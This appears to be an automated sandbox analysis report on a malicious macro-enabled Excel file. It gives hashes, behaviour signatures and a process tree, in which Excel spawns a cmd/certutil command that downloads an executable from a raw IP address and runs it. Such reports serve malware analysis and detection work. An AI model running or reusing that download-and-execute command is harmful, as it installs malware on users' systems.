Analysis

  • max time kernel
    106s
  • max time network
    83s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2022, 16:30

General

  • Target

    MT-07610135.xlsm

  • Size

    363KB

  • MD5

    7ebdf90e9c2b2dc740b5a930aaae9c55

  • SHA1

    1387b0f912d54f9528665dba4889daac9abae2e8

  • SHA256

    dcbcdca874fa56a439e396a29375b40b3d5774029ad62a841878d9783bf01143

  • SHA512

    9f1617bbe2dcda9fb5677a002777f5c192edc1e6caa9b26b61a53df72c894ff562f3321fae9bb8349382e44ebd4ba1fe3ecc323538970d7966301dda8351df46

  • SSDEEP

    6144:Qw+RqiI9rPYvKW88hNdgZKoJzHN0/5DC5GHvvxU99oCnlAyPPyuUTuc9r33Yad:QfI9rgy583oJzeOcHvG99oep3B6uc9Tr

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\MT-07610135.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://54.249.210.44/xi/loader/uploads/MT-07610135.exe" Fagzhypsfqyfoobdopiqn.exe.exe && Fagzhypsfqyfoobdopiqn.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\SysWOW64\certutil.exe
        certutil.exe -urlcache -split -f "http://54.249.210.44/xi/loader/uploads/MT-07610135.exe" Fagzhypsfqyfoobdopiqn.exe.exe
        3⤵
          PID:2020

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1612-54-0x000000002F6C1000-0x000000002F6C4000-memory.dmp

            Filesize

            12KB

          • memory/1612-55-0x0000000070F41000-0x0000000070F43000-memory.dmp

            Filesize

            8KB

          • memory/1612-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1612-57-0x0000000071F2D000-0x0000000071F38000-memory.dmp

            Filesize

            44KB

          • memory/1612-58-0x0000000075091000-0x0000000075093000-memory.dmp

            Filesize

            8KB

          • memory/1612-62-0x0000000071F2D000-0x0000000071F38000-memory.dmp

            Filesize

            44KB

          • memory/1612-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1612-64-0x0000000071F2D000-0x0000000071F38000-memory.dmp

            Filesize

            44KB